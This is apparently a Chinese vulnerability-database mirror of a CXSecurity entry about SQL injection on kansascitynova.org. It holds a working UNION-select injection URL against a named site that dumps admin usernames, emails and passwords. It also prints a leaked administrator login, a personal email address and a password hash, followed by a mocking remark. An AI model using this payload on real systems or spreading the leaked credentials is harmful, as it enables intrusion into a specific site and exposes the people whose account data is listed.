kansascitynova.org SQLi - CXSecurity.com

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1836677 漏洞类型
发布时间 2019-11-26 更新时间 2019-11-26
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2019110160
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
#Exploit Title :kansascitynova.org SQLi
#Date : 2019/11/25
#Exploit Author : AmirAli Sadeghi Tamiz
#DEMO:
http://kansascitynova.org/news.php?id=42%27%20union%20select%201,group_concat(username,0x3a,email,0x3a,password),3,4,5,6,7%20from%20sadmin_users--+
 
#POC:
user:Gministrator1
email:jobrielle@gmail.com
pass_hash:88a74fd4f4e802d1d122033033205c65

#Message:
No bypass ,it's shamefull. :))